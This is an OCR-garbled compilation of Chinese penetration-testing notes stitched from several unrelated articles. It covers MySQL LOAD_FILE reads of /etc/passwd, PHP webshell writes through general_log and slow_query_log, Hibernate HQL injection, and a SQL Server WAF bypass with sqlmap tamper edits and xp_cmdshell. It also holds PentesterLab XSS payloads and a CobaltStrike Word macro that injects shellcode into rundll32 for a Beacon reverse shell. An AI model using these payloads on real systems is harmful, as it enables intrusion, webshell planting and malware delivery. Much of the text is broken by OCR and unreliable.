本 次 提 到 的 内 容 涉及 的 是 GRANT 和 REVOKE 的 允许 静态 权限 中 的 file 
在 渗透 测试 过 程 中 ， 碰 到 load_flle 读 取 文 件 的 前 提 条 件 : 

MySQL LOAD FILE () 读 取 文 件 并 以 字符 串 形式 返回 文件 内 容 。 
LOAD_FILE (file_name) 

其 中 file_name 是 带路 径 的 文件 名 。 

语法 图 : 


[OAD_FILE} XO O 


(©) w3resource.com 


SELECT * LOAD_FILE('/home/username/myfile.txt') 
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Mysql 版 本 差异 


53 之 前 版 本 ， 默 认 情 况 下 此 变量 为 空 ， 允 许 使 用 mysql 终 端 对 secure_fle_priv 参 数 更 新 (不 讨论 
环境 安装 情况 ) 。 


5 及 之 后 版 本 修改 secure_file_priv 值 只 能 修改 my.cnf 配 置 文件 〈 不 讨论 windows 环 境 安装 ) 。 


成 功 与 失败 利用 实例 


能 使 用 navicat 连 接 数 据 库 ( 非 root 权 限 用 户 ) : 


用 load_file 读 取 服 务 器 文件 、 读 取 站 点 配置 文件 、 站 点 源码 ， 进 一 步 getshell。 


how global variables like '%secure%'; 
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昌 保存 0 查询 创建 工具 “美化 SQL () 代码 段 ORR TS 


localhost v || B test v| b 运行 已 














kho v global variables like “*secure%' ; 





























信息 ”结果 1 ait RS 
Variable name Value 
> secure auth OFF 
secure file priv NULL 
























































































































































































































































**secure_file_priv 的 值 为 null， 那 么 secure_file_priv 这 里 都 有 什么 设置 呢 
secure_file_priv 为 null 表示 不 允许 导入 导出 

secure_file_priv 指 定 文件 夹 时 表示 mysql 的 导入 导出 只 能 发 生 在 指定 的 文件 夹 
secure_file_priv 没 有 设置 时 则 表示 没有 任何 限制 六 














想 要 成 功利 用 load_file 函 数 ， 必 须 设置 secure_file_priv 变 量 为 室 ， 这 样 读 取 文件 也 就 没有 限制 

























































































set global secure_file_priv="; 
注意 : 修改 secure_file_priv 配 置 后 ， 需 要 重启 mysql 才 能 生效 。 
进一步 读 取 : /etc/passwd 文 件 


select load file('/etc/passwd'); 
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d file('/etc/passwd") 
3) 1.26 KB 






来 后 (BLOB) 1.26KB， 发 现 为 BLOB 二 进 制 数据 ， 为 方便 获取 文件 信息 ， 


reshark 读 取 MySQL 协 议 中 的 第 一 个 Request Query 信 息 : 


ation Frotocol Lei nto 
.68.8* MySQL 76 Request Query 
16.12 MySQL 55 RESPO 








168.t MySQL 79 Request Query 

16.1t MySQL — 1434 Response 

16.16 MySQL 1434 ResponseResponse 

168." TCP 54 6787 + 3306 [ACK] Seq=39 Ack=2772 Win=1624 Len=@ 
16.1 MySQL 1434 ResponseResponse 

16.1 MySQL 1434 ResponseResponse 

168. , TCP 54 6787 + 3306 [ACK] Seq-39 Ack-5532 Win=1024 Len-0 
16.1 MySQL 1434 ResponseResponse 

16.1: MySQL 965 ResponseResponse 

168.1 TCP 54 6787 + 3306 [ACK] Seq=39 Ack=7823 Vin-1024 Len=@ 
168.t MySQL 78 Request Query 

16.1€ MySQL — 1434 Response 

16.10 MySQL — 1424 ResponseResponse 

168.86 TCP 54 6787 + 3306 [ACK] Seq=55 Ack=10583 Win=1024 Len=0 
16.10. MySQL 1434 ResponseResponse 

16.18. MySQL 1434 ResponseResponse 

168.88 TCP 54 6787 + 3306 [ACK] Seq=55 Ack=13343 Win=1024 Len=0 


i ), 76 bytes capturea (608 bits) on interface 0 
9:ff:49:b3:8c:08 (00:f£f:49:b3:8c:08), Dst: 00:ff:4a:b3:8c:08 (00:ff:4a:b3:8c:08) 
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not 
ne. log i 
vc log i 
ogi | 
gi | 
gi | 
gin i 
gi: 
E i 
leg i logi: 
E 
p yom 
om 
& — umm " 
COPPET. schema. STATUS. STATUS 





è tow oa t AS * 


成 功 读 取 /etc/passwd 文 件 内 容 。 
2. 失 败 案例 
MySQL 5.6 版 本 


RedHat 6.2 版 本 


variables like 4 

~~~-+--4-------+] Variable name | Value | 

--$-----~-+| secure file priv | NULL | 
-—-24-------t1 row in set (0.00 sec) 


因为 secure _file_priv 参 数 是 只 读 参数 ， 不 能 使 用 set global 命 令 修 改 。 


secure file prava ; 


): Variable 


提示 报错 ，secure _file_priv 为 只 读 变 量 ， 无 法 进一步 利用 load file, into outfile 读 取 文 件 和 写 入 文 
件 。 


五 、 脑 洞 大 开 
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cure file_priv 为 空 ， 能 够 写 入 文件 。 

备 写 入 特定 目录 ， 如 /var/www/html 网 站 路 径 权 限 。 

入 的 文件 能 够 正常 解析 。 

-种 思路 (需要 mysql root 权 限 ) 

T general_log 的 值 为 on， 同 时 general_log file 修 改 为 网 站 绝对 路 径 + 文件 。 


秆 网 站 查询 sql 语 句 (伪造 sql 语 句 的 查询 一 句 话 后 门 ， 很 多 情况 下 仅 能 写 入 php) ， 将 会 向 网 站 
径 下 写 入 sql 语 句 ， 访 问 写 入 的 文件 ， 可 成 功 getshell。 


: 很 多 情况 下 碰 到 的 实战 环境 特别 苛刻 、 严 格 ， 不 是 像 在 靶 机 环境 一 样 一 帆 风 顺 ， 往 往 需要 灵 
对 各 种 不 同 复杂 环境 ， 从 中 找 出 一 条 适合 自己 测试 的 方向 。 
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Hibernate 基 本 注入 
基本 概念 


JDBC: 提供 了 一 组 Java API 来 访问 关系 数据 库 的 Java 程序 。 
ORM: 对 象 关 系 映 射 


。 实体 类 与 数据 库 表 一 一 对 应 
。 不 需要 操作 数据 库 ， 而 是 操作 实体 类 对 象 


Hibernate : 


。 基于 ORM 的 一 种 框架 

。 对 JDBC 代 码 进行 封装 

。 开发 者 不 需要 写 SQL 语 句 就 能 实现 对 数据 库 进行 增删 改 查 

。 属于 dao 层 

。 适用 于 MS SQLSERVER、ORACLE、SQL、H2、Access 和 Mysql 等 多 种 数据 库 。 


基本 配置 与 操作 


。 使 用 配置 文件 使 实体 类 与 数据 库 表 关 联 
。 操作 对 象 实现 数据 库 表 的 增删 改 查 


maven 


<dependency> 
<groupId>org.hibernate</groupId> 
<artifactId>hibernate-core</artifactId> 
<version>5.2.6.Final</version> 
</dependency> 


hibernate 配 置 文件 : 必须 在 src/main/resource 文 件 夹 下 


9 Project Structure 


€ dec Descriptors 
testone 


Ri reps 






Path 
| Aüsers/hddjlideaProjects/testone/src/main/java/hibernoi? 


Type 








Hibernate Configuration 


Project 


Spring 





Web 
Libraries Web2 
Facets 
Artifacts 

Platform Settings 
SDKs 
Global Libraries 


Problems 
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DOCTYPE hibernate-configuration PUBLIC 

= "-//Hibernate/Hibernate Configuration DTD//EN" 
"http://www.hibernate.org/dtd/hibernate-configuration-3.0.dtd"> 
hibernate-configuration> 

‘<session-factory> 


E - - 





«property name="connection.url">jdbc:mysql://localhost :3306 
/hibernate</property> 
«property name="connection.driver_class">com.mysql.jdbc.Driver</property> 


«property name="connection, username">root</property> 








«property name="connection. password">root</property> 
«property name="hibernate.show_sql">true</property> 
«1 i^ 
<property name="hibernate, format_sql">true</property> 
Zl- 5 
«property name="hibernate.hbm2ddl.auto">update</property> 
«i-- BürEGEREZS: AUS ISE SEES le 
«property name="hibernate.dialect">org.hibernate.dialect .MySQLDialect</prope 
€... BRSiBrg xí 
» «mapping resource="Test.hbm.xml" /> 
</session-factory> 






/hibernate-configuration» 


public class Usertest { 

P. public int id; 

pubiic String username; 
public String password; 


NK AAC St: Test.hbm.xml 
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<?xml version="1.0" encodingz"UTF-8"?» v 

<!DOCTYPE hibernate-mapping PUBLIC 

| "-//Hibernate/Hibernate Mapping DTD 3.0//EN" 
"http: //www.hibernate.org/dtd/hibernate-mapping-3.0.dtd"» 

«hibernate-mapping package="com.springboottest.testone.security.module"> 














«class name-"Usertest" table="user” catalogz"hibernate"» 











«id name="id" columnz"id" length="3"> 


«generator class="native"></generator> 
«/id» 
«property name="username"™ 








e" column-" username" length="20"></property> 

«property name="password" columnz"password" lengthz'"20"»«/property» 
«/class» 

«/hibernate-mapping» 


测试 类 




















public class testAdd { 

@Test 

public void testAdd(){ 
Configuration cfg - new Configuration(); 
cfg.configure(); 
SessionFactory sessionFactory - cfg.buildSessionFactory(); 
Session session=sessionFactory.openSession(); 
Transaction tx-session.beginTransaction(); 


Usertest usertest=new Usertest(); 
usertest.setId(i); 
usertest.setUsername("hhh"); 
usertest.setPassword( 123456"); 


session.save(usertest); 
tx.commit(); 
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ublic class testAdd { 













ie Gest] 
public void testAdd(){ - : » "n 
Configuration cfg - new Configuration(); 
cfg.configure(); 
SessionFactory sessionFactory - cfg.buildSessionFactory(); 
Session session=sessionFactory.openSession(); 
Transaction tx-session.beginTransaction(); 
Usertest usertest=new Usertest(); 
usertest.setId(1); 
usertest.setUsername("hhh"); 
usertest.setPassword( 123456"); 
session.save(usertest); 
tx,commit(); 
a testadd testAdd(} 
: i 
E... 
n J JUU Waa VLUUYU VEYO MAMET MACE a LLC NG Le Ua Co LILALYyI Pare LLiILLIIY RUA AC de 
5. 308 [main] DEBUG org.hibernate.internal.util.EntityPrinter ~ com.springboottest.testone, security 
mainl DEB ora, hibernate.SQL - 
insert 
| into 
: hibernate.user 
(username, password, id) 


| values 
y Ep, ty 7) 

bernate: 

~ insert 

| into 

hibernate.user 
(username, password, id) 


129:0 nain] DEBUG org.hibernate.resource.jdbc.internal.LogicalConnectionManagedImpl - Initiating 
28 105. 343 [main] DEBUG org.hibernate.resource.jdbc.internal.LogicalConnectionManagedImpl - Initiating 


添加 操作 代码 
使 用 save， 不 太 可 能 会 出 现 拼 接 漏洞 
因此 在 添加 、 创建 操作 下 ，Hibernate 大 概率 不 会 出 现 注 入 漏洞 


Usertest usertest=new Usertest(); 
usertest.setUsername(username) ; 
usertest.setPassword(password); 


session.save(usertest); 
”查询 操作 代码 
”createQuery 容 易 出 现 拼接 漏洞 


实际 上 ， 比 较 容易 出 现 漏洞 的 是 在 like '%xxx%' 、 order by xxx 这 种 语句 中 
修改 操作 和 删除 操作 代码 中 如 果 存 在 查询 操作 代码 ， 也 有 可 能 出 现 拼接 漏洞 
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Query query=session.createQuery("from Usertest where usernames ' "44 
List<Usertest> list=query.list(); 
List<Integer> a = new ArrayList<>(); 
for (Usertest usertest: 
FISE) f 
a.add(usertest.getId()); 


。 Hibernate 支 持 输入 


o and or 
o database() user() version() ascii() 


假设 开发 者 未 进行 过 滤 ， 则 可 存在 万 能 密码 


Tor a fe 
1' or user() like '%root% 






é Q © 127.0.0.1:8081/teschaxun?username=hhh%27° 
A 学 习 


J0r%20%271 





7027 = Ya 


On o4 QN LÁ 


* Hibernate 不 支持 输入 union/select 
因此 无 法 进行 爆 库 


[ JE ] the back-end DBMS is MySQL 

back-end DBMS: MySQL 5 

[ T ] fetching database names 

[ dE ] fetching number of databases 

í ak ) running in a single-thread mode. Please consider usage of option ' ' for faster data retrieval 
t Jot ] retrieved: 

[ I ] reflective value(s) found and filtering out 

[ Jor ] unexpected HTTP code ' ' detected. Will use (extra) validation step in similar cases 

I shai ] in case of continuous data retrieval problems you are advised to try a switch ' | or switch "OERE 
[ ] [ERROR] unable to retrieve the number of databases 

[ Me ] falling back to current database 

t dul ] fetching current database 

[ IE ] retrieved: 

I 2 t ] unable to retrieve the database names 

t TU ] HTTP error codes detected during run: 

500 (Internal Server Error) - 6 times 


回 显 证 明 无 法 输入 union， 对 mysql 语 名 进行 监听 ， 没 有 监听 到 此 union 语 句 





Co @ 127001 2 à 6 & 
NER W 
: 
Whitelabel Error Page 
This application has no explicit mapping for /error, so you are seeing this as a fallback. 
Tue Nov 12 16:07:37 CST 2019 
There was an unexpected error (type-Internal Server Error, status=500). 
org.hibernate.hqlinternal ast QuerySyntaxException| unexpected token: union hear line 1, column 77 [from com springboottest.testone security module Usertest where usemname=T union 


select 3 from user where '1'="1'] 
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路 径 com.springboottest.testone.security.module.Usertest 
" l A 


ertest 是 定义 用 户 的 类 ， 其 与 数据 库 中 的 用 户 数据 表 一 一 对 应 ， 因 此 很 有 可 能 就 是 数据 表 名 


ES o 02001: 


his application has no explicit mapping for /error, so you are seeing this as a fallback. 


i Nov 08 17:05:27 CST 2019 
yere was an unexpected error (type-Internal Server Error, status=500). 
d ate.QueryException: expecting "’, found '<EOF>' [fromicom.springboottest.testone.security.module.Usertest 






here username='1"] 
和 解 字段 名 
assword 是 另 一 字段 名 ， 因 此 输入 以 下 语句 并 未 报错 


“1' or password='2 


€ Œ © 1270.0.1:8081/teschaxun?usernamez 196279620019? 620password «96272 


OH 应 用 6 学 习 


password1 是 不 存在 的 字段 名 ， 因 此 输入 以 下 语句 报错 


- 1' or passwordi-'2 


i GC © 1270.0.1:8080/teschaxun?username: 1962796200r962Dpassword1E 79272 


Hwa ES 学 习 


_Whitelabel Error Page 


al 


. This application has no explicit mapping for /error, so you are seeing this as a fallback. 


Fri Nov 08 17:37:25 CST 2019 
There was an unexpected error (type-Internal Server Error, status-500). 
org.hibernate.exception.SQL GrammarException: could not extract ResultSet 
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- 


mysql 利用 general log file. slow query log - 
文件 






高 版 本 的 mysql 中 ， 一 般 默 认 配 置 了 --secure_file_priv 为 null 限 制 了 文件 写 入 。 这 时 ， 可 以 通 ， 
的 general_log_fle、slow_query_ log file 来 党 试 写 文件 。 


general log file 


set global general log-'on'; 

SET global general log file-'D:/phpStudy/WwW/1.php'; 
SELECT '«?php assert($ POST["cmd"]);?»'; 

set global general log-'off'; // 切 记 关 闭 


slow query log file 用 到 了 mysql 的 慢 查 询 ， 全 名 是 慢 查 询 日 志 ， 是 MySQL 提 供 的 一 种 日 志 记 
录 ， 用 来 记录 在 MySQL 中 响应 时 间 超 过 疝 值 的 语句 。 开 启 之 后 默认 阀 值 是 10s， 可 以 更 改 此 时 间 


set global slow_query_log=on; 

set global slow query. log file="C:\\phpStudy\\PHPTutorial\\WwW\\3. php" 
select sleep(15),'«?php assert($ POST["cmd"]);?»' 

set global slow query log-off 
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cm 



















= 04>) SQL Server 注 入 Getshell 
)1 前 言 
菲 基础 类 的 首 及 文章 ， 主 要 分 享 内 网 中 遇 到 的 一 个 有 趣 案例 。 


02 Bypass 注 入 点 


情况 下 ， 遇 到 SQL Server 注 入 点 ， 我 会 比较 关注 是 否 是 DBA 权 限 ， 如 果 是 ， 那 么 就 可 能 拿 到 执 
令 的 权限 ， 进 而 反弹 到 C2 上 ， 方 便 后 续 的 后 渗透 工作 。 


fF 始 在 一 处 比较 复杂 的 功能 点 发 现 了 SQL Server 的 注入 ， 也 是 首先 利用 AND 进 行 判断 : 





|: ModuleType 存 在 注入 点 ， 但 是 后 面 有 -一 层 站 点 全 局 输入 的 检测 机 制 ， 从 简单 的 测试 来 看 ， 是 
存在 语法 分 析 的 一 种 ， 比 较 容易 绕 过 。 

党 试 了 以 下 方案 : 

l. and -> And 

and -> /**/And 

à and -> /*xsww!s*/And 


. and -» /*xswwS1154-_[0)}!s*/And 
and -» /***/And 


BARI TAMAR, EERE /***/ 是 否 和 And 是 一 个 本 体 。 
了 么 我 猜想 到 了 一 个 简单 的 表达 式 ， 似 乎 和 这 个 过 滤 规 则 比较 相向 : /*\wf9,}*/ 
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0x03 tamper 自动 化 实现 


这 里 我 比较 懒 ， 直 接 改 了 以 下 space2comment.py， 这 个 脚本 在 Kali Linux 中 的 sqlmap 目 录 下 ; 





TE ls /usr/share/sqlmap/tamper/ | grep space2 
space2dash. py 
space2hash. py 
space2morecomment.py 
space2morehash. py 


space2mssqlblank.py 

space2mssqLhash. py 

space2mysqlblank.py 

space2mysqlidash.py 

space2pLlus.py 

space2randombLank. py 
:~# 


核心 代码 
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B 4 in xrange(len(payload)): 
E t firstspace: 
| payload[i].isspace(): 

| firstspace = 


retVal += 


payload[i] == 
quote = quote 


payload[i] == 
doublequote = doublequote 


payload[i] == doublequote quote: 
retVal += 


中 需要 替换 /**/ 即 可 : 


for i in xrange(len(payload) ): 
if not firstspace: 
if payload[i].isspace(): 
firstspace = True 
retVal += "/*ixxxx**/" 
continue 





elif payload[i] 
quote = not 


elif payload[i] 
doublequote = a doublequote 


接着 ， 就 可 以 跑 出 注入 了 - 


PS: 我 比较 习惯 于 添加 --random-agent 参数 ， 理 由 是 在 注入 的 过 程 中 ， 避 免 被 流量 感知 设备 发 
现 。 
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Title: Microsoft SQL Server/Sybase boolean-based blind - Stacked queries , 
Payload: (["ClientType": "", "ClientGuid": "99a37ee1-5ec3- 46db -9279- 4cb66e;. 
1) SELECT 7581 ELSE DROP FUNCTION jkQW--", "IsBackEnd": false ] 


Type: error-based 
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING Claus, 
Payload: ("ClientType": "", "ClientGuid": "09a37eel-5ec3-46db-9279-4cb6666; 
(SELECT (CHAR(113)*CHAR(98)-CHAR(120) *«CHAR( 113) €CHAR(113)* (SELECT (CASE WHEN (0 
ND) ) +CHAR( 113) +CHAR( 106) +CHAR(98)+CHAR(120)+CHAR(113)))-- UfsY", "IsBackEnd": +, 


Type: time-based blind 

Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) 

Payload: {"ClientType": "", "ClientGuid": "09a37ee1-5ec3-46db-9279-4cb06662), 
ELECT COUNT(*) FROM sysusers AS sysl,sysusers AS sys2,sysusers AS sys3,sysUsers 4 
s6,sysusers AS sys7)-- ujsX", “IsBackEnd”: false } 


[08:30:59] [WARNING] changes made by tampering scripts are not included in ‘Shown 
A 59] [INFO] testing Microsoft SQL Server 
00] [INFO] confirming Microsoft SQL Server 
5] [INFO] the back-end DBMS is Microsoft SQL Server 

back-end DBMS: Microsoft SQL Server Unknown 
[08:31:06] [INFO] testing if current user is DBA 
current user is DBA: True 
[08:31:07] [WARNING] HTTP error codes detected during run: 
400 (Bad Request) - 4 times, 500 (Internal Server Error) - 4 times 
[08:31:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/gg; 


(*] ending @ 08:31:07 /2019-12-14/ 


TE 





0x04 xp cmdshell 


到 这 一 步 的 时 候 ， 我 遇 到 了 一 个 问题 ，SQLMAP 调 用 exec master.xp_cmshell 的 时 候 被 拦截 了 ， 
为 后 端 还 检测 是 否 有 exec. master ， 于 是 我 还 要 将 tamper 加 两 句 : 


payload 


payload.replace("exec","/***/Execute/***/") 
payload = payload.replace("master..","/***//***/") 


最 终结 果 : /***/execute/***//***/xp cmdshell/***/'whoami' 


点 击发 包 ， 还 是 无 法 执行 ， 被 360 拦 截 了 ! 





"Message””S.stem Data SqlClient SqlException (0x80131904 
p_emedshell c: uQO2 'CreateProcessu002 7 


i 
d 


uui m LI! Wye rn at 





_ovsten a SqiClient Sql Connection OnErroriSi 
breakt annerctinn © : 





| wrant ASEINAAN AAN a 


这 个 Error Code 5 ， 是 Windows 的 错误 代码 ， 中 文 意思 就 是 : “拒绝 访问 "。 
现在 xp_cmdshell 被 拦截 的 很 多 了 ， 但 是 sp_oacreate 应 该 可 以 使 用 的 : 


参考 我 之 前 写 的 一 篇 文章 : 
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pi: 









clare @shell int exec sp oacreate 'wscript.shell',Qshell output exec sp_oamett 


TIADUBPRERSFHxp cmdshell, XJ HechoZ 9, BBIEJERBAUGÉ S, MILES, I T—DX 
至 ， 精 神 焕发 ， 遂 查 到 数据 库 备份 的 方式 。 


("ClientType": "", "ClientGuid": "09a37ee1-5ec3-46db-9279-4cb066622e8d", "Module 
> 
面 返 回 正常 。 

是 ， 我 的 站 点 目录 如 果 是 中 文 呢 ? 在 Burp 里 处 理 就 非常 麻烦 ! 


记得 之 前 的 1IS 7.5 吗 ，1IS 在 接收 到 一 个 请 求 后 ， 会 自动 将 数据 进行 Unicode 解 码 ， 如 果 流量 设 
WAF 不 支持 此 特性 的 话 ， 就 可 以 进行 绕 过 ， 这 里 我 着 重 解决 中 文 目录 的 问题 。 


| 这 此 文 就 结束 了 ， 我 并 没有 成 功 Getshell， 只 是 回顾 我 解决 问题 的 思维 方式 ， 希 望 能 对 大 家 有 
J! 
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entesterlab xss 





itesterlab ze— SEU I 

















192.15! won 
Cte 3e Mj Console | Clouds. 
Web For Pentester 
This exercise is a set of the most common web vulnerabilities 
XSS SQL injections Directory traversal 
. E . mamei $ 
File Include Code injection Commands injection 
LDAP attacks File Upload XML attacks 
ample 1 
单 ， 没 有 任何 过 滤 
H 
‘name=<script>alert("xss")</script> 
BI 192.168.1.172/:0s/enarmplet php na t»alert(x pacis 


LB https//codevisualst.. 49 Most Visited C) Offensive Security C) Exploit-DB 















Example 2 ^ "a 


可 以 看 到 这 里 过 滤 了 script 标签 


PentesterLab » Web for Pe X Mas 


192.168.1.172 -9 





Google C) httpsy/code.visualst.. Hf Most Visited (Q Offensive Security © Exploit 





Dns © sate (rn 





wan se OF has Bag 








发 现 图 片 标签 没 过 滤 ， 构 造 ( 去 掉 .) 


?name=<img onerror.=alert(/xss/) src=1 > 






PentesterLab » Web for Pe 


192.168.1.172 






Google (a) https://code.visualst. 





« T Most Visited © Offensive Security @ Exploit-DB 
G Os 





s navbar -FAKEN 
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xample 3 
Tea 


ame=<img onerror.-alert(/xss/) src > 


E xX o i^ 192.168.1.172 


ELS Or RES Google © httos//code.visualst.. Xt Most Visited © Offensive Security © Exploit-DB 





Osis O WB () enean G 








B 0r 





xample 4 


E 


N^. Se depu 
T PentesterLab » Web for pe X 


e Ô o 192.168.1.172 
新 手 上 路 DRESS Google © https://codevisualst... $F Most Visited © Offensive Security Q Exploit-DB 


Q Osss Ossie Oi 
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还 是 用 (去 掉 .) 


?name=<img onerror.-alert(/xss/) src > 


* PentesterLab » Web for Pe X 


e X Q9 
国 新 手 上 路 0 assa ^ 


192.168.1.172 








Google © https://code.visualst... 4% Most Visited ® Offensive Security @ Exploit-DB 


Example 5 


似乎 过 滤 了 alert 只 要 输入 alert 就 error 


我 们 可 以 用 prompt(1), 与 confirm(1) 来 弹 窗 


?name= <script>prompt(1)</script> 


Example 6 
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Ev: 









Es BREA C Google © httes//codexisualst.. QR Most Visited @ Offensive Security © Exploit-DB 
Q Osss Dres D aem Oscaam Osr One thas Bra cum 


+ 





量 输 入 是 做 s 变 量 ， 用 双 引 号 绕 过 


q 


2name=";alert(1)//" 


example 7 


0 

6 差不多 ， 就 是 把 双 引 号 改 单 引号 

weiuov * yeu iui re A 

E ec Ò 192.168.1.172 

| SLB RMT C Google © https//codevisualst.. Ht Most Visited © Offensive Security © Exploit-DB 

_ = 二 
十 






2 see DSa OERREH Qt O58 


Hello > sont 


'PentesterLab 2015 











"?namez';alert(1)// 


j 


=xample 8 


RERI T RANE 
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PentesterLab = Web for Pe- X 


c C à 192.168.1.172 

国生 上 路 Gersa ^ Google Q httpsi/codevisualst.. 4 Most Visited Offensive Security © Exploit-DE 
Q On sss O #28 ()ezsa8 pr 
c 

Your name 提交 查询 





En mem 


猜测 表单 部 分 $ sERVER[PHP sELF] 构造 


example8.php/"»«script»alert(1)«/script» 


Example 9 


PentesterLab » Web for Pe X 
所 D 192.168.1.172 "g ; 


me 





^? Google © httosyi/codewisualst... Hf Most Visited © Offensive Security © Exploit-DB 
QC Ots Da {) sna Ore On tas Bea 
+ vt HTM 





scripts hellocxtion E 0 


document .write(location.hash.substring(1)); 


使 用 <script>alert(1)</script> 被 转 义 了 ， 也 请 各 位 大 佬 看 看 怎么 破 。 
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ice 宏 的 基本 利用 
Li 


ffice 宏 ， 译 自 英文 单词 Macro。 宏 是 Office 自 带 的 一 种 高 级 脚本 特性 ， 通 过 VBA 代 码 ， 可 以 在 
ffice 中 去 完成 某 项 特定 的 任务 ， 而 不 必 再 重复 相同 的 动作 ， 目 的 是 让 用 户 文档 中 的 一 些 任务 自动 
。 而 宏 病 毒 是 一 种 寄存 在 文档 或 模板 的 宏 中 的 计算 机 病毒 。 一 旦 打开 这 样 的 文档 ， 其 中 的 宏 就 会 
执行 ， 于 是 宏 病 毒 就 会 被 激活 ， 转 移 到 计算 机 上 ， 并 驻 留 在 Normal 模 板 上 。 


isual Basic for Applications (VBA) 是 Visual Basic 的 一 种 宏 语言 ， 是 微软 开发 出 来 在 其 桌面 应 用 
序 中 执行 通用 的 自动 化 (OLE) 任 务 的 编程 语言 。 主 要 能 用 来 扩展 Windows 的 应 用 程序 功能 ， 特 别 
Microsoft Office 软 件 ， 也 可 说 是 一 种 应 用 程式 视觉 化 的 Basic 脚本 。 


不 境 准 备 


。 Windows 7 x64 旗舰 版 
i Microsoft Office 2016 
e CobaltStrike 3.14 


;obaltStrike 生 成 宏 
利用 CobaltStrike 生 成 宏 payload， 接 下 来 只 要 放 入 word、excel| 或 ppt 即 可 。 


Follow these steps to add this Macro to a Microsoft Word or Excel document: 


1. Open Microsoft Word or Excel ® 
, SES 2. Go to View -» Macros -» View Macros S 
Bou HTML Application 3. Change Macros in to the current file I Copied text to clipboard 






Web Drive-by ^ (EY E 4. Give your macro a name (any name is OK) 
Phish 5. Click Create (axi 
Spear Phis Payload Generator 6. Clear the editor dam 
7. Press Copy Macro to copy the macro to your clipboard. ^ ^ ^" 
erue USB/CD AutoPlay 8. Paste the macro P» 


9. Close the macro editor window 


Windows Dropper 
10. Save the document as a macro-enabled docu 


Windows Executable 


Windows Executable (S) |- Copy Macro 


3252 Word 


打开 Word 文 档 ， 点 击 "Word 选项 一 自 定义 功能 区 一 开发 者 工具 ( 勾 选 ) 一 确定 " 。 
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Bsp RED SR Ob da d e 








新 建议 项 卡尺 — 新建 组 如) Tos 


Et ESQ Y 





H*e- 0: 文档 1 - Word 












Ed Aa Aa cx Ug Maran 
9 tt aa Ter ES 
A FR CE 
加 Word COM NST ee 
Leese snm TE gm 
puel 控件 IRS? TRIS 





Macro backdoor !. 


Wik "ThisDocument" ， 将 原 有 内 容 全 部 清空 ， 然 后 将 CobaltStrike 生 成 宏 payload 全 部 粘贴 进去 ， 
保存 并 关闭 该 VBA 编辑 器 。 
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Bou mw š -Sx 












- m te, Open 
3 T PtrSafe Function CresteStuff Lib "kernal32^ Alias ‘CreateRes By¥al dwSteckSize Ax Long DyVsl lpStartAddress 
t FtrSafe Panctica AllecStuff Lib "kernel" Alia "Ya teslálls prada eee M Ss. USE ad Ee ‘Long, ByVal FlAllecationIype As Long, ByVal flProt- dm 
PurSafe Function WriteStuff Lib "kernel32" Alias ory ByVal Mrocess À Las DVG West As Lenghtr, Byhef Source As Any, ByVal Length As Long, ByVal Langth¥ ot» 
Pusefe Function BusStuff Lib “kernel3e” Alias "CrestefrocesiA" (Byval Iplpplicatieniane As String Dye Po dre ry di String. IpProcessAttributes Ax Any, IpThreadAttributes : 


. e Long, ByVal dvStackSize As Long, ByVal lpftertAddress As Long, 
Function AllocStuff Lib “kernel32~ Alias “VirtualAllocEs” ER M lue be "ifa Tra he Log riot As Pag ByVal flAllocstionType As Long ByVal flfrotect As Le 
Tran: WriteStuff Lib "kernal32^ Ali "rri taProcerdlenory™ Gy¥al AProcess Az Long, ByVal IDest Az Leng. ByRef Source As Any, ByVal Length Ar Leng By¥al Langthirote As Long) 

Fonction RunStuff Lit “kernel32* Alias “CreateProcessk” ByVal lpApplicationMwee Ac String wa lareandLins ie tring lphroceszhttributes As Any, IpThrasdACtributes As Any, | 
































Function CreateStuff Lit ^kerna132* Alias “CresteRenoteThve: 








Zub Aute_Open() 
yte As Long wyhrray As Variant, offset As Long 
Dim pInfe As PROCESS_INPORMATION 

Die slnfe As STARTUMINEO 
Dim sull Ax 

Dim sProe A 









LE VBAT Then 
Die rwxpage Ax Longbtr. res As LongPtr{ 
Ms 
Dim rexpege As Long, rex As Long 
"ua 





6, 100, < J 1T, 2, 
-48, -117, 20, -123, -64, 116, 74, 
, ~ie, 3 , 88, -117, 88, 

99, 95, . 104, 110, 101 

. 81, 106, 3, 8l. 
n. 
=) 

101, i10, 116. 
9r, 105, 110, 100 . 115, E | 4 49, «L. 13, 10, , 9T -40, 19, -56, 53, 7 
75, ， . 790, 114, , 1 ; ^ ore rH 64, 75, 29, | as. 

CA A, , -33, X 


a " 3 . LJ , 
, 83, -119, -25, 8, 104, 0, 22 gt os E) * ax 18, -106, -119, 
49, S2, Sp, «5, 50, S6, «6, 50, 0, 80, 31, 53, 
vivant Progr waWet her 
Esviren Cwindir^) & “\\Sys¥OWO4\\rundl132. exe 





sProc = Environ l sindir") & "\\Systo 
End If 


\rundl132 





res = RunStuff (Mull, aoc, ByVal Of, ByVal O& ByVal 18 EpVal 44, ByVal OM, suli, slnfe, plafo) 


rmzpag = AllecStuff(plnfs Mrocess 0. Ub 
For offset = LBound inyArray! Te UBound yArr 
aybyte = ayhrr ey (offset) 
ax = FriteStuff plnfo hrecess, rexpage + offset, mylyte, 1, ByVal 08) 
West offset 

rex = CraateStuff (pings Mrecess, O, O, rexpags, 0, C, 0) 
End Sub 
Sub Autoðpan Ù 
Auto Open 





4 nyArray), &MIOO 4440) 








为 的 Word 类 型 务必 要 选 "Word 97-2003 文档 (*.doc)", Bl doc 文件 ， 保 证 低 版 本 可 以 打开 。 之 
E 闭 ， 再 打开 即 可 执行 宏 代 码 。 



























= 最 近 访 问 的 位 置 = E 1 Administrator 
VÀ OneDrive jd 系统 文件 来 d ^ 系统 文件 来 


aE | unn 
“Bas iia pare 
ie) 图 片 


oe.) 
d 音乐 


m 计算 机 











到 


RR OD: T i ee eet 
4372263 er): [Word 97-2003 WHY (k. doc) 


$ 






BRE Word (k, dotm) 
Word Ta 1 (*. dot) 
df 







en html) 
A (k. htm;*. html) 
k rtf) 


































































































































































































































































































反弹 Beacon shell 


默认 情况 下 ，Office 已 经 禁用 所 有 宏 ， 但 仍 会 在 打开 Word 文 档 的 时 候 发 出 通知 。 
um 
受信 任 的 点 布 者 
受信 尾 位 置 
SETHI 
性 的 加 载 项 目录 






ixi 





r5 
(e 
t 


HRS TREC 
C 启用 所 有 宏 (不 推荐 : 可 能 会 运行 有 潜在 分队 的 代码 ) EE) 


An 
ni 


FRARE RA 
[ 信任 对 vba 工程 对 象 模 型 Ql9] Q2 
全 悍 护 的 视图 
消息 栏 
ZUHRA 
隐私 选项 
